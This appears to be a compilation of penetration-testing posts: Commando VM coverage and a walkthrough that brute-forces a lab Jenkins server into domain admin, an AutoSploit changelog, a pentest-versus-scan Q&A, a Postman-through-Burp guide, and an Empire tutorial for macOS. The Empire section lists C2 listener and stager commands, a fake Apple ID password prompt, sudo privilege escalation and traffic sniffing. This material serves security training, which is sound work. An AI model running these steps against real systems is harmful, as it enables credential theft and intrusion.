FireEye's “Commando VM” Allows You To Hack Using Your Windows PC

“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests.” reads the post published by FireEye.

“The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install all software packages, and delivers many tools and utilities to support penetration testing.

Just running a single command automatically updates all hacking software that you have installed.

It also automatically installs more than 140 tools, including Nmap, Wireshark, Covenant, Python, Go, Remote Server Administration Tools, Sysinternals, Mimikatz, Burp Suite, x64dbg, and Hashcat, on your Windows machine.

“With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer,” says FireEye.

There is also full support for blue teamers, who are involved in the defense of networks and would like to use Commando VM. The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities.

“With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends,” adds FireEye.

Commando VM users are advised to run the distribution in a virtual machine (VM), as this eases deployment and provides the ability to revert to a clean state prior to each engagement. The minimum requirements for installation of Commando VM are 60GB of disk space and 2GB of memory, and the operating system should be Windows 7 Service Pack 1 or Windows 10. Windows 10 allows more features to be installed.

“We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform,” concluded FireEye.

You can download the installation script of Commando VM from GitHub.

Source: FireEye Blog

The post FireEye’s “Commando VM” Turns Your Windows PC Into Hacking Machine appeared first on TechWorm.

Security Affairs: Commando VM – Using Windows for pen testing and red teaming

Commando VM — Turn Your Windows Computer Into A Hacking Machine

FireEye released Commando VM, a Windows-based security distribution designed for penetration testers who intend to use the Microsoft OS.

FireEye released Commando VM, the Windows-based security distribution designed for penetration testing and red teaming.

FireEye today released an automated installer called Commando VM (Complete Mandiant Offensive VM), an automated installation script that turns a Windows operating system into a hacking system. The installation script works on systems running in a virtual machine (VM) or even on the base system.

“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests.” reads the post published by FireEye. “The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install all software packages, users need at least 60 GB of free hard drive space and 2GB of RAM to use it.

Commando VM automatically installs more than 140 hacking tools, including Nmap, Wireshark, Remote Server Administration Tools, Mimikatz, Burp-Suite, x64dbg, Metasploit, PowerSploit, Hashcat, and OWASP ZAP.

Commando VM

Experts who want to use a Windows OS for penetration testing activities have to install hacking tools on Windows manually, a task that can hold many difficulties for most users.

Commando VM allows downloading additional offensive and red team tools on Windows, bypassing the security features implemented by Microsoft that flag them as malicious. The installer disables many Windows security features, and its execution will leave a system vulnerable; for this reason, FireEye strongly encourages installing it on a virtual machine.

Commando VM can be installed on Windows 7 Service Pack 1 or Windows 10; the latter OS allows more features to be installed.

One of the authors of Commando VM explained on Reddit that its top three features are:

  • Native Windows protocol support (SMB, PowerShell, RSAT, Sysinternals, etc.)
  • Organized toolsets (Tools folder on the desktop with Info Gathering, Exploitation, Password Attacks, etc.)
  • Windows-based C2 frameworks like Covenant (dotnet) and PoshC2 (PowerShell)

“With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer,” continues FireEye.

“The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities. With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends.”

Commando VM is available for download on GitHub; below is a step-by-step guide to install it:

  1. Create and configure a new Windows Virtual Machine.
  • Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
  • Take a snapshot of your machine!
  • Download and copy install.ps1 onto your newly configured machine.
  • Open PowerShell as an Administrator.
  • Enable script execution by running the following command:
    • Set-ExecutionPolicy Unrestricted
  • Finally, execute the installer script as follows:
    • .\install.ps1
    • You can also pass your password as an argument: .\install.ps1 -password <password>

“We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform.” concluded FireEye.

Pierluigi Paganini

(SecurityAffairs – Commando VM, hacking)

The post Commando VM – Using Windows for pen testing and red teaming appeared first on Security Affairs.




Commando VM — Turn Your Windows Computer Into A Hacking Machine

FireEye today released Commando VM, which according to the company, is a "first of its kind Windows-based security distribution for penetration testing and red teaming." When it comes to the best operating systems for hackers, Kali Linux is always the first choice for penetration testers and ethical hackers. However, Kali is a Linux-based distribution, and using Linux without learning some

How Chris Thomas Paired His Passion for Blockchain With Pen Testing

Chris Thomas, X-Force Red’s blockchain security expert, has always had an interest in understanding how technologies are built and operated. As a young child, Chris’ father thought it would be enjoyable for the two to build a computer instead of buying a premanufactured one. After two attempts, the father-and-son duo successfully built Chris’ first computer. Little did they know the project would ignite Chris’ future career as a penetration tester.

At just 11 years old, Chris performed his first penetration test, hacking into his school’s network. The content of his school’s information technology class wasn’t challenging for Chris, giving him plenty of time to teach himself how to program and code. Using his self-taught knowledge, he was able to scan the school’s network and access Windows shares that allowed him to log in as a domain administrator. Because he has a strong moral compass, Chris communicated his findings to the school’s system administrator, who became a close ally and supported Chris’ work. Through this experience, Chris knew he wanted to become a penetration tester.

Starting a Career in Penetration Testing

After secondary school, Chris pursued and completed an undergraduate degree in programming and a graduate degree in cybersecurity. He then began his first full-time job working as a system administrator for a large technology company in Manchester, England. Chris’ knowledge was second to none, but his employer would not let him begin his career as a penetration tester with the company. It was not until Chris alpha tested and passed the CREST CRT exam that his company moved him to a junior penetration tester position.

Over the next 10 years, Chris excelled in his role as a penetration tester and became a principal consultant, serving as the technical lead on a project for a large financial institution. He and his team managed the company’s global penetration testing network and built the network access controls from scratch. In the midst of that project, Chris met Thomas MacKenzie, who is now X-Force Red’s associate partner in Europe, the Middle East and Africa.

Joining the X-Force Red Team

Chris has been infatuated with blockchain technology since its inception and its initial ties to cryptocurrency. With a passion for understanding how systems work and function, he immediately educated himself on all things blockchain and bitcoin and has continued researching and tinkering with the technologies ever since.

When Thomas joined X-Force Red, he contacted Chris about his interest in joining the team as well. Thomas knew Chris had a strong interest in blockchain and reminded him that IBM was one of the industry leaders in developing new blockchain technology. Thomas suggested that Chris become X-Force Red’s leading blockchain testing expert, an opportunity Chris accepted without hesitation.

In his current role, leading X-Force Red’s blockchain testing services, Chris combines his passion for penetration testing with his love for blockchain. The team works with clients to find weaknesses not only in the implementation and use of blockchain technology itself, but also in the connected infrastructure.

Alongside X-Force Red’s veteran hackers, who are also developers and engineers, Chris is excited to help shape the adoption and implementation of blockchain across various industries.

Learn more about X-Force Red Blockchain Testing

The post How Chris Thomas Paired His Passion for Blockchain With Pen Testing appeared first on Security Intelligence.

Commando VM: The First of Its Kind Windows Offensive Distribution


For penetration testers looking for a stable and supported Linux testing platform, the industry agrees that Kali is the go-to platform. However, if you’d prefer to use Windows as an operating system, you may have noticed that a worthy platform didn’t exist. As security researchers, every one of us has probably spent hours customizing a Windows working environment, and we all use the same tools, utilities and techniques during customer engagements. Maintaining a custom environment while keeping all our tool sets up to date can therefore be a monotonous chore. Recognizing that, we have created a Windows distribution focused on supporting penetration testers and red teamers.

Born from our popular FLARE VM that focuses on reverse engineering and malware analysis, the Complete Mandiant Offensive VM (“Commando VM”) comes with automated scripts to help each of you build your own penetration testing environment and ease the process of VM provisioning and deployment. This blog post discusses the features of Commando VM and its installation instructions, and walks through an example use case of the platform. Head over to GitHub to find Commando VM.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests. The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey and MyGet packages to install all of the software, and delivers more than 140 tools and utilities to support penetration testing; the complete tool list is available on the Commando VM GitHub repo.
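Because the tooling is delivered as Chocolatey packages, keeping the tool set current later is straightforward. As a minimal sketch, assuming the standard choco client that ships with the distribution:

choco upgrade all -y

This upgrades every installed package in one pass; individual tools can be added or updated the same way.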

With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer. For the blue teamers reading this, don’t worry, we’ve got full blue team support as well! The versatile tool sets included in Commando VM provide blue teams with what they need to audit their networks and improve their detection capabilities, and the library of offensive tools makes it easy to keep up with offensive tooling and attack trends.


Figure 1: Full blue team support

Installation

Like FLARE VM, we recommend you use Commando VM in a virtual machine. This eases deployment and provides the ability to revert to a clean state prior to each engagement. We assume you have experience setting up and configuring your own virtualized environment. Start by creating a new virtual machine (VM) with these minimum specifications:

  • 60 GB of disk space
  • 2 GB memory

Next, perform a fresh installation of Windows. Commando VM is designed to be installed on Windows 7 Service Pack 1, or Windows 10, with Windows 10 allowing more features to be installed.

Once the Windows installation has completed, we recommend you install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing. From this point, all installation steps should be performed within your VM.

  1. Make sure Windows is completely updated with the latest patches using the Windows Update utility. Note: you may have to check for updates again after a restart.
  2. We recommend taking a snapshot of your VM at this point to have a clean instance of Windows before the install.
  3. Navigate to the Commando VM repository on GitHub and download the compressed repository onto your VM.
  4. Follow these steps to complete the installation of Commando VM:
    1. Decompress the Commando VM repository to a directory of your choosing.
    2. Start a new session of PowerShell with elevated privileges. Commando VM attempts to install additional software and modify system settings; therefore, elevated privileges are required for installation.
    3. Within PowerShell, change directory to the location where you have decompressed the Commando VM repository.
    4. Change PowerShell’s execution policy to unrestricted by executing the following command and answering “Y” when prompted by PowerShell:
      • Set-ExecutionPolicy unrestricted
    5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. Commando VM needs the current user’s password to automatically log in after a reboot. Optionally, you can specify it by passing “-password <current_user_password>” at the command line. A consolidated example follows.
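For reference, the full sequence from the elevated PowerShell prompt looks roughly like this (the download path and password are illustrative):

Set-ExecutionPolicy unrestricted
cd C:\Users\demo\Downloads\commando-vm-master
.\install.ps1 -password DemoPassword1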


Figure 2: Install script running

The rest of the installation process is fully automated. Depending on your internet speed, the entire installation may take two to three hours to finish. The VM will reboot multiple times due to the numerous software installation requirements. Once the installation completes, the PowerShell prompt remains open, waiting for you to press any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 3: Desktop environment after install

At this point it is recommended to reboot the machine to ensure the final configuration changes take effect. After rebooting you will have successfully installed Commando VM! We recommend you power off the VM and then take another snapshot to save a clean VM state to use in future engagements.

Proof of Concept

Commando VM is built with the primary focus of supporting internal engagements. To showcase Commando VM’s capabilities, we constructed an example Active Directory deployment. This test environment may be contrived; however, it represents misconfigurations commonly observed by Mandiant’s Red Team in real environments.

We get started with Commando VM by running network scans with Nmap.
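A sweep along these lines would produce similar output; the subnet matches the 192.168.38.0/24 lab network used later in this walkthrough, and the exact flags are illustrative:

nmap -sV 192.168.38.0/24 -oA internal_discovery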


Figure 4: Nmap scan using Commando VM

Looking for low hanging fruit, we find a host machine running an interesting web server on TCP port 8080, a port commonly used for administrative purposes. Using Firefox, we can connect to the server via HTTP over TCP port 8080.


Figure 5: Jenkins server running on host

Let’s fire up Burp Suite’s Intruder and try brute-forcing the login. We navigate to our Wordlists directory in the Desktop folder and select an arbitrary password file from within SecLists.


Figure 6: SecLists password file

After configuring Burp’s Intruder and analyzing the responses, we see that the password “admin” grants us access to the Jenkins console. Classic.


Figure 7: Successful brute-force of the Jenkins server

It’s well known that Jenkins servers come installed with a Script Console and run as NT AUTHORITY\SYSTEM on Windows systems by default. We can take advantage of this and gain privileged command execution.


Figure 8: Jenkins Script Console

Now that we have command execution, we have many options for the next step. For now, we will investigate the box and look for sensitive files. Through browsing user directories, we find a password file and a private SSH key.


Figure 9: File containing password

Let’s try and validate these credentials against the Domain Controller using CredNinja.


Figure 10: Valid credentials for a domain user

Excellent, now that we know the credentials are valid, we can run CredNinja again to see what hosts the user might have local administrative permissions on.
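The invocations look roughly like the following. The flags are my recollection of the CredNinja README, so treat them as an assumption and verify them against the project page:

# accounts.txt holds lines like WINDOMAIN\niso.sepersky:Password123 (format illustrative)
python CredNinja.py -a accounts.txt -s targets.txt -t 10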


Figure 11: Running CredNinja to identify local administrative permissions

It looks like we only have administrative permissions over the previous Jenkins host, 192.168.38.104. Not to worry, though: now that we have valid domain credentials, we can begin reconnaissance activities against the domain. By executing runas /netonly /user:windomain.local\niso.sepersky cmd.exe and entering the password, we will have an authenticated command prompt up and running.


Figure 12: cmd.exe running as WINDOMAIN\niso.sepersky

Figure 12 shows that we can successfully list the contents of the SYSVOL file share on the domain controller, confirming our domain access. Now we start up PowerShell and start share hunting with PowerView.


Figure 13: PowerView's Invoke-ShareFinder output

We are also curious about what groups and permissions are available to the compromised user account. Let’s use the Get-DomainUser module of the post-exploitation framework PowerView to retrieve user details from Active Directory. Note that Commando VM uses the “dev” branch of PowerView by default.
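From the authenticated PowerShell session, the share-hunting and user-lookup steps sketch out as follows; the module path is hypothetical, and the account name follows this walkthrough:

Import-Module C:\Tools\PowerView.ps1
Invoke-ShareFinder -CheckShareAccess
Get-DomainUser niso.sepersky -Domain windomain.local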


Figure 14: Get-DomainUser win

We also want to check for further access using the SSH key we found earlier. Looking at our port scans we identify one host with TCP port 22 open. Let’s use MobaXterm and see if we can SSH into that server.
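From any command line, the equivalent attempt would look like this; the key file name, user and host are illustrative:

ssh -i jenkins_user_key user@192.168.38.105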


Figure 15: SSH with MobaXterm

We access the SSH server and also find an easy path to rooting the server. However, we weren’t able to escalate domain privileges with this access. Let’s get back to share hunting, starting with that hidden Software share we saw earlier. Using File Explorer, it’s easy to browse shares within the domain.


Figure 16: Browsing shares in windomain.local

Using the output from PowerView’s Invoke-ShareFinder command, we begin digging through shares and hunting for sensitive information. After going through many files, we finally find a config.ini file with hardcoded credentials.


Figure 17: Identifying cleartext credentials in configuration file

Using CredNinja, we validate these credentials against the domain controller and discover that we have local administrative privileges!


Figure 18: Validating WINDOMAIN\svcaccount credentials

Let’s check group memberships for this user.


Figure 19: Viewing group membership of WINDOMAIN\svcaccount

Lucky us, we’re a member of the “Domain Admins” group!

Final Thoughts

All of the tools used in the demo are installed on the VM by default, as well as many more. For a complete list of tools, and for the install script, please see the Commando VM Github repo. We are looking forward to addressing user feedback, adding more tools and features, and creating many enhancements. We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform.

Whitehat settings allow white hat hackers to Test Facebook mobile apps

Facebook introduced new settings designed to make it easier for cyber experts to test the security of its mobile applications.

Facebook has announced the implementation of new settings to make it easier for white hat hackers to test the security of its mobile applications.

To protect Facebook users, the company’s mobile apps implement security mechanisms such as certificate pinning, which ensures the integrity and confidentiality of the traffic sent from the user’s device to Facebook servers.

While measures like certificate pinning improve the overall security of the platform, they make it harder for experts to test Facebook mobile apps for server-side security bugs.

Facebook has decided to introduce new settings that white hat hackers can change on their own accounts so that they can inspect network traffic associated with the Facebook, Messenger and Instagram applications during testing sessions.

“Today we are pleased to announce that we heard the feedback and implemented a means for security researchers to analyze network traffic on Facebook, Messenger and Instagram Android applications on their own accounts for bug bounty purposes.” reads the announcement published by Facebook.

“We advise turning these settings off while not testing our website for security vulnerabilities.”

Facebook settings

Security experts who want to test security features of the Facebook mobile apps have to enable the “Whitehat settings” in the web-based version of Facebook and then in the mobile application.

Once the users have enabled the ‘Whitehat Settings,’ a button will be displayed in the selected app’s menu and an alert is displayed at the top of the screen to warn that traffic may be monitored.

Pierluigi Paganini

(SecurityAffairs – Facebook Whitehat settings, penetration testing)

The post Whitehat settings allow white hat hackers to Test Facebook mobile apps appeared first on Security Affairs.


UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed

I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and covered its subsequent update, AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post describes the changes between the last release and the newest version, which adds a number of features and bug fixes. This release is code-named The New Year’s edition!

AutoSploit 3.0

What is AutoSploit?

AutoSploit stands for Automated Mass Exploiter. It attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions.

AutoSploit 3.0 Changelog:

This release adds new features and fixes a few bugs. A brief summary of the changes:

New Features

  • New terminal, which now also supports:
    • Custom Commands
    • Command History
    • Native binary execution (/bin & /sbin)
  • Host file backup support
  • Options to renew or reset API tokens

Bug Fixes:

The following issues are now resolved:

  • #213: Unhandled Exception (2c39b844a)
  • #219: Unhandled Exception (c7a9d05a9) : argument of type ‘int’ is not iterable
  • #221: Unhandled Exception (18733e7e2) : [Errno 17] File exists: ‘/home/mental/Desktop/Sec/AutoSploit/autosploit_out/2018-10-26_13h13m45s/’
  • #224: Unhandled Exception (c395b62f5) : [Errno 2] No such file or directory: ”
  • #225: Unhandled Exception (471b81ae6) : HTTPSConnectionPool(host=’api.zoomeye.org’, port=443): Max retries exceeded with url: /user/login (Caused by SSLError(SSLError(1, u'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)’),))
  • #240: Unhandled Exception (2fd7b91c2)
  • #250: Unhandled Exception (e700f5322) : ‘access_token’

Download AutoSploit 3.0:

AutoSploit 3.0 (AutoSploit-3.0.zip/AutoSploit-3.0.tar.gz) can be downloaded from the project’s GitHub repository. Another way is to perform a git pull in an existing clone to get everything from the source repository.
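Starting from scratch instead, cloning and launching it looks roughly like this. The repository is the public NullArray/AutoSploit project; the entry-point script name is from memory, so verify it against the README:

git clone https://github.com/NullArray/AutoSploit.git
cd AutoSploit
pip install -r requirements.txt
python autosploit.py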


The post UPDATE: AutoSploit 3.0 – The New Year’s edition appeared first on PenTestIT.

Vulnerability Assessments Versus Penetration Tests: A Common Misconception

X-Force Red is an autonomous team of veteran hackers within IBM Security that is hired to break into organizations and uncover risky vulnerabilities that criminal attackers may use for personal gain. Our team recently unveiled new statistics collected from its penetration testing engagements. One statistic that stood out, although not surprisingly, was that out of 1,176 phishing emails sent to employees within five organizations from October 2017 to November 2018, 198 people clicked on the malicious link inside the email and 196 people submitted valid credentials.

While those numbers do not appear significantly high, they still show that criminals had 196 unique opportunities to move around inside a target organization and access sensitive data. And considering one set of valid credentials is all it might take for a criminal to launch an attack, 196 of them is a gold mine.

These security mistakes are the types of vulnerabilities that can be identified by penetration testers. On the other hand, vulnerability assessments, which typically require an automated scanning tool, are designed to identify known system vulnerabilities. However, despite those differences, some vendors, cybersecurity professionals, marketing teams and others often use the terms “penetration testing” and “vulnerability assessment” interchangeably, mixing two completely different security engagements.

It’s a misconception that should be corrected so that security professionals understand exactly what they are buying and receiving and how that investment will help solve the challenge at hand. If they are unwittingly misled into buying the wrong solution for their environment, a critical unknown vulnerability exposing a high-value asset could be missed.

A Q&A With X-Force Red Penetration Testing Consultant Seth Glasgow

Seth Glasgow, an X-Force Red penetration testing consultant, has participated in many conversations with clients and security professionals where he has had to clarify the difference between vulnerability assessments and penetration testing. I chatted with Seth about the misconception, including how it came to be and what the difference is between penetration testing and vulnerability assessments.

Question: Seth, thank you for chatting with me about this topic. Can you provide more details about how some in the industry use penetration testing and vulnerability assessments interchangeably?

Glasgow: Sure, Abby. Some vendors, security professionals and others in the industry believe penetration testing is a substitute for vulnerability scanning, or vice versa. Basically, they say they don’t need both; they need one or the other. Sometimes, the two names alone cause confusion. Some may say “vulnerability testing” or “penetration scanning.” Others may say they offer penetration testing, but it’s really just an automated scan that can find known vulnerabilities. It does not involve actual manual testing.

To cover all your bases, it’s best to use a combination of manual penetration testing and vulnerability assessments. I like to compare it to clubs in a golf bag. Not every club is needed for every shot, but to play the whole game, you need all of them.

I like that analogy. How do you think this mixing of the two terms came to be? Was it marketing-related where marketers used the same language to describe the different solutions?

Glasgow: There are a few reasons, none of which began with marketing. One is related to compliance. Some mandates lump penetration testing and vulnerability assessments into one requirement, which muddies the water. At a technical level, the conversations are like a game of telephone. Information is repeated in the wrong context, and before you know it, a vendor is offering to sell a low-cost “penetration test,” but it’s really an automated scan. Also, in the past, the two terms could have been used interchangeably based on the threat and vulnerability landscape at the time. Whereas today, the two are very different and solve different problems.

Can you provide an example of how the evolution of the industry has caused significant differentiation between the two?

Glasgow: Sure, I have a couple examples. In the past, before the cloud became popular, most companies worked with physical servers. A vulnerability assessment, which involved scanning servers before they went into production, was often all that was needed to find critical vulnerabilities and make sure they were patched. After all, the servers were managed locally, making it somewhat easier to control the security around them (such as who can access them). Today, an increasing number of companies are migrating to the cloud, which has a large variety of other security implications. At a minimum, this means more server configurations need to be set up, and there can be less control and visibility into who’s accessing which data from which network. In this new security environment, penetration testing is essential in identifying configuration and access control vulnerabilities and can link those vulnerabilities together to show how an attacker could leverage them to compromise a cloud environment.

Another example is with the Payment Card Industry Data Security Standard (PCI DSS). Companies could comply with older versions of the standard by just doing a vulnerability assessment and possibly a light penetration test. However, in the PCI DSS version 3.2, the requirements specify companies implement a penetration testing methodology (see requirement 11.3) and say companies must “validate segmentation,” which can only be done by performing a manual penetration test.

So, what is the difference between the two? Can you break it down for us?

Glasgow: Whereas vulnerability scanning is 10 miles wide and one mile deep, penetration testing is 10 miles deep and one mile wide. Vulnerability assessments involve automated scanning, which casts a wide net across the entire network. Scanning evaluates every in-scope system to identify known vulnerabilities. Vulnerability assessments review systems for patching and security configuration items that represent security risk. They also include confirmation that the vulnerabilities are real and not false positives; however, they do not include exploitation of the vulnerability. Frequent assessments are important because they enable companies to understand what their attack surface looks like on a regular basis. The vulnerability landscape is constantly evolving as new discoveries are made and patches are released. I could scan a system today and have a clean bill of health, but I could scan that same system next month and find critical vulnerabilities.

Penetration testing is a manual exercise that focuses on identifying and exploiting vulnerabilities within the in-scope networks and applications. It can assess all facets of the security of a company, including networks, applications, hardware, devices and human interactions. The facets to test are decided prior to the engagement. Testing involves hackers actively exploiting vulnerabilities, emulating how a criminal would leverage and link vulnerabilities together to move laterally and/or deeper into the network to access the crown jewels. As testers, we are less concerned about vulnerabilities we cannot exploit, or those that don’t lead to anywhere valuable.

For example, let’s say you have a webpage that hosts an online brochure and has minimal user engagement. A vulnerability assessment will treat that page the same as if it were a webpage with a high level of user engagement. A penetration test would not focus on that page because the testers know it wouldn’t lead them to a highly valuable place. They may be able to use information from the brochure to move elsewhere within the network; however, they would focus on other components that would give them the most access.

Think of it this way: A vulnerability assessment identifies if the office doors in a building are unlocked. A penetration test identifies what criminals would do once they are inside the office.


Figure 1: Top differentiators between vulnerability assessments and penetration testing (source: X-Force Red)

I have one final question: If I am a cybersecurity leader looking for penetration testing services, which red flags should I look for that may indicate a vendor is actually offering a vulnerability assessment but says it’s a penetration test?

Glasgow: Be wary of the timeline. A good penetration test doesn’t adhere to a strict timeline, but it should take at least a week’s worth of work. And that’s on the low end. If a vendor is saying they can perform a test with a much quicker turnaround, that’s a sign they are probably going to use an automated scanning tool and quickly send you a report of all the findings. Also, ask about the deliverable. What kind of information will be in the findings report? If it’s a spreadsheet with scan results, that’s a sign it’s a vulnerability assessment. A penetration testing report typically includes the findings, a detailed narrative of what the testers did and remediation recommendations.

The report should also include the types of testing performed to help ensure security professionals know where remediation emphasis should be placed to make a network more difficult for hackers to gain access, maintain access and exfiltrate data.

Download the free white paper, “Penetration Testing: Protect Critical Assets Using an Attacker’s Mindset.”

The post Vulnerability Assessments Versus Penetration Tests: A Common Misconception appeared first on Security Intelligence.

Eyewitness – Open Source Target Visualization and Recon Tool

Got a huge list of targets that you’d like to enumerate but can’t really visit each and every IP individually?

Eyewitness – Open Source Target Visualization and Recon Tool on Latest Hacking News.

Better API Penetration Testing with Postman – Part 2

In Part 1 of this series, I walked through an introduction to Postman, a popular tool for API developers that makes it easier to test API calls. We created a collection, and added a request to it. We also talked about how Postman handles cookies – which is essentially the same way a browser does. In this part, we’ll tailor it a bit more toward penetration testing, by proxying Postman through Burp. And in the upcoming parts 3 and 4, we’ll deal with more advanced usage of Postman, and using Burp Extensions to augment Postman, respectively.

Why proxy?

By using Postman, we get its benefits as a superior tool for crafting requests from scratch and managing them. By proxying it through Burp, we gain Burp’s benefits: we can fuzz with Intruder, the passive scanner highlights issues for us, and we can leverage Burp extensions, as we will see in Part 4 of this series. We can also use Repeater for request tampering. Yes, it’s true that we could do our tampering in Postman, but there are two strong reasons to use Repeater: 1) Postman is designed to issue correct, valid requests, and under some circumstances it will try to correct malformed syntax; when testing for security issues, we may not want it correcting us. 2) By using Repeater, we maintain a healthy separation between our clean-state request in Postman and our tampered requests in Repeater.

Setting up Burp Suite

An actual introduction to Burp is outside the scope of this particular post. If you’re reading this, it’s likely you’re already familiar with it; we aren’t doing anything exotic or different for API testing.
If you’re unfamiliar with it, PortSwigger’s official documentation is a good place to start.

Now, launch Burp and check the Proxy -> Options tab.
The top section is Proxy Listeners, and you should see a listener on 127.0.0.1, port 8080. It must be Running (note the checkbox). If it’s not running by default, that typically means the port is not available, and you will want to change the listener (and Postman) to a different port. As long as Burp is listening on the same port Postman is trying to proxy through, your setup should work.

Also check the Proxy -> Intercept tab and verify that Intercept is off.

Configuring Postman to Proxy through Burp

Postman is proxy-aware, which means we can point it at our man-in-the-middle proxy, which for this post is Burp Suite (my tool of choice). We’ll open the Settings dialog by clicking the Wrench icon in the top-right (1) and then the Settings option on its drop-down menu (2).
This will open a large Settings dialog with tabs across the top for the different categories of settings. Locate the Proxy tab and click it to navigate there.

Opening the Postman Settings pane

There are 3 things to do on this tab:

  1. Turn On the Global Proxy Configuration switch.
  2. Turn Off the Use System Proxy switch.
  3. Set the Proxy Server IP address and port to match your Burp Suite proxy interface.
Proxy Settings Tab – Pointing Postman at your Burp Suite listener

The default proxy interface will be 127.0.0.1, port 8080 assuming you are running Burp Suite on the same machine as Postman. If you want to use a different port, you will need to specify it here and make sure it’s set to match the proxy interface in Burp.

Now that you are able to proxy traffic, there’s one more hurdle to consider. Today, SSL/TLS is used on most public APIs. This is a very good thing, but it means that when Burp man-in-the-middles Postman’s API requests and responses, you will get certificate errors unless your Burp certificate authority is trusted by your system. There are two options to fix this:

  1. You can turn off certificate validation in Postman. Under the General settings tab, there’s an SSL certification verification option. Setting it to Off will make Postman ignore any certificate issues, including the fact that your Burp Suite instance’s PortSwigger CA is untrusted.
  2. You can trust your Burp Suite CA in your system trust store. The specifics of how to do this are platform-specific; a Linux sketch follows after this list.
    PortSwigger’s documentation for it is here: https://support.portswigger.net/customer/portal/articles/1783075-Installing_Installing%20CA%20Certificate.html
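As an example, on a Debian/Ubuntu system the exported Burp CA can be converted and added to the trust store roughly like this (file names are illustrative; Postman may need a restart to pick up the change):

# convert the exported Burp CA from DER to PEM
openssl x509 -inform der -in cacert.der -out burp-ca.crt
# add it to the system trust store
sudo cp burp-ca.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates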

Verify that it is working

Issue some requests in Postman. Check your HTTP History on the Proxy tab in Burp.

Proxy history in Burp Suite

Troubleshooting

  • Your request is stalling and timing out? Verify that Intercept is Off on the Proxy tab in Burp. Check that your proxy settings in Postman match the Proxy Interface in Burp.
  • Postman is getting responses but they aren’t showing in the Proxy History (etc) in Burp? Check the Settings in Postman to verify that Global Proxy Config is turned on. Make sure you haven’t activated a filter on the History in Burp that would filter out all of your requests. Also make sure your scope is set, if you’re not capturing out-of-scope traffic.

Next Steps

So far, these have been two posts of fairly elementary setup activity. Now that we have our basic tool chain in place, we’re ready for more advanced material. Part 3 will deal with variables in Postman and how they can simplify your life. It will also dig into the scripting interface and how to use it to simplify interactions with more common, modern approaches to auth, such as Bearer tokens.

OSX Exploitation with Powershell Empire

This article is another post in the Empire series. In this article, we will learn OS X penetration testing using Empire.

Table of Content

Exploiting MAC

Post Exploitation

  • Phishing
  • Privilege Escalation
  • Sniffing

Exploiting MAC

Assuming you know PowerShell Empire’s basics, we will create the listener first using the following commands:

uselistener http
set Host http://192.168.1.26
execute

Executing the above commands will start up the listener as shown in the image above. The next step is to create a stager for OS X. For that, type:

usestager osx/launcher
execute

As you can see in the image above, the stager will generate a code. Execute this code on the target system (i.e., OS X), and after execution you will have your session as shown in the image below:

Post Exploitation

Phishing

Now that we have a session on the Mac, there are a few post-exploitation modules we can use to our advantage. The first module we will use is collection/osx/prompt. This module asks the user to enter their Apple ID password, which means it does not work in stealth mode. To use this module, type:

usemodule collection/osx/prompt
execute

Executing the above module will open a prompt on the target machine as shown in the image below, and once the password is entered, you have it in clear text as shown in the image above.

Privilege Escalation

For privilege escalation on OS X, we use the module privesc/multi/sudo_spawn. To use this module, type:

usemodule privesc/multi/sudo_spawn
set Listener http
set Password toor
execute

Executing this module will give you admin rights with a new session, as you can see in the image below :

Sniffing

The module we will use is collection/osx/sniffer. This will capture all the traffic coming to and going from the target system and give us all the necessary details by creating a pcap file. To use the module, type:

usemodule collection/osx/sniffer
execute

As you can see, you will even find the password in clear text in the pcap file, as shown in the image below:

The next post-exploitation module takes a screenshot of the target system; to use it, type:

usemodule collection/osx/screenshot
execute

The above module will take a screenshot as shown in the image below :

There are a number of further post-exploitation modules that you can use and experiment with, as shown in the image below:

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post OSX Exploitation with Powershell Empire appeared first on Hacking Articles.

Security Misconfigurations

